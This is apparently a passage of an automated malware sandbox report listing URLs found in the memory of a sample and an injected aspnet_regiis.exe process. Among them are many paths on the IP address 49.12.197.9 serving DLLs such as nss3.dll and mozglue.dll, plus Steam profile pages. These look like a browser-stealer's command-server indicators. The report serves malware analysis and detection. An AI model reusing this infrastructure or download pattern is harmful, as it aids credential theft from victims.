                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813466721.0000000003242000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0X
                          Source: file.exeString found in binary or memory: http://ocsp.entrust.net02
                          Source: file.exeString found in binary or memory: http://ocsp.entrust.net03
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                          Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: file.exeString found in binary or memory: http://www.entrust.net/rpa03
                          Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                          Source: aspnet_regiis.exe, 00000003.00000002.2588969920.000000002200D000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://49.12.197.9
                          Source: aspnet_regiis.exe, 00000003.00000003.1630664282.0000000003187000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.0000000003181000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1725774113.00000000031E8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1748296840.00000000031E8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.0000000003181000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645187719.0000000003186000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.0000000003187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/&He
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9//Hn
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/0Hw
                          Source: aspnet_regiis.exe, 00000003.00000003.1659962296.0000000003181000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/4
                          Source: aspnet_regiis.exe, 00000003.00000003.1748296840.00000000031E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/6b
                          Source: aspnet_regiis.exe, 00000003.00000003.1748296840.00000000031E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/AR:
                          Source: aspnet_regiis.exe, 00000003.00000003.1616949837.0000000003187000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.0000000003187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/B
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/QK
                          Source: aspnet_regiis.exe, 00000003.00000003.1630664282.0000000003187000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.0000000003181000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.0000000003181000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645187719.0000000003186000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/Z
                          Source: aspnet_regiis.exe, 00000003.00000003.1725774113.00000000031E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/es
                          Source: aspnet_regiis.exe, 00000003.00000003.1748296840.00000000031E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/freebl3.dll
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1748296840.00000000031E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/freebl3.dllG
                          Source: aspnet_regiis.exe, 00000003.00000003.1748296840.00000000031E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/freebl3.dllpData
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/mozglue.dll
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/msvcp140.dll
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/msvcp140.dll=Bx
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/nss3.dll
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/nss3.dll;
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/softokn3.dll
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003167000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/sqlp.dll
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/vcruntime140.dll
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9GDHJDBKF--
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9HJDBKF
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9JJJECA
                          Source: aspnet_regiis.exe, 00000003.00000003.1724730041.000000000326A000.00000004.00000020.00020000.00000000.sdmp, EHJKKK.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003290000.00000004.00000020.00020000.00000000.sdmp, GIEBFH.3.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003290000.00000004.00000020.00020000.00000000.sdmp, GIEBFH.3.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                          Source: aspnet_regiis.exe, 00000003.00000003.1589017924.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                          Source: aspnet_regiis.exe, 00000003.00000003.1724730041.000000000326A000.00000004.00000020.00020000.00000000.sdmp, EHJKKK.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: aspnet_regiis.exe, 00000003.00000003.1724730041.000000000326A000.00000004.00000020.00020000.00000000.sdmp, EHJKKK.3.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: aspnet_regiis.exe, 00000003.00000003.1724730041.000000000326A000.00000004.00000020.00020000.00000000.sdmp, EHJKKK.3.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.co
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzol
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwP
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
